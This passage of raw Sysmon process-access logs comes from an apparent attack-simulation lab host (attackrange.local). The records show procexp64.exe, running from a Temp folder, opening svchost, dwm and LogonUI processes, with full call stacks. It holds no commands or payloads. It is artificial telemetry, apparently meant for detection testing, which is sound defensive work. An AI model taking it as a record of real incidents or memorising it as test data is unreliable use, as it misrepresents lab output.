9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784597Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784596Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784595Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784594Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784593Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784592Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784591Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784590Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784589Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784588Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784587Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784586Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784585Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784584Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784583Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784582Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784581Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784580Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\